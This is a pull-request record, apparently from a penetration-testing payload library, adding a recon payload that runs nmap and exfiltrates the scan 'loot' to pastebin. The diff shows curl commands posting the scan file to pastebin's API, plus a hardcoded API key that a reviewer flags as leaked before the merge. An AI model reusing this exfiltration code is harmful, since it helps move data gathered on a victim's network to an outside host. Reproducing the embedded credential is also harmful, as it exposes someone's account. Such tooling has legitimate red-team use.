### PR TITLE
Payload based on example nmap payload but with pastebin ex-filtration

### PR DESCRIPTION
**Pull request by monsieurmarc**
Made a pastbin supporting version of your nmap sample

### CODE REVIEW

File: payloads/library/recon/nmap with pastebin exfil/payload.sh [hunk 1]
```diff
@@ -0,0 +1,103 @@
...
+
+function pastebin () {	
+	#Send the nmap scan file text to the pastebin via the api
+     TEXT=$(<$LOOT_DIR/nmap-scan_$SCAN_M.txt)
+     curl -d 'api_paste_code='"$TEXT"'' -d 'api_dev_key='"$API_KEY"'' -d 'api_user_key='"$LOGIN_KEY"'' -d 'api_option=paste' -d 'api_paste_private=2' 'http://pastebin.com/api/api_post.php'
+}
+
+function login(){
+	#Login to pastebin and get a login key
+     	LOGIN_KEY=$(echo | curl -d @- -d 'api_dev_key=21ecdb136aab5344c0a623d0e168cb74' -d 'api_user_name='"$API_USER"'' -d 'api_user_password='"$API_PASSWORD"'' 'https://pastebin.com/api/api_login.php')
```
Comment (Foxtrot) [inline payloads/library/recon/nmap with pastebin exfil/payload.sh]: Looks like you left your API key in here... oops?

**Comment by monsieurmarc** [comment]
Doh!  This is my first pull request ever.  I'll fix it

**Comment by monsieurmarc** [comment]
Ok changes made.

**Comment by Foxtrot** [comment]
Great! Thank you!

**Pull request merged**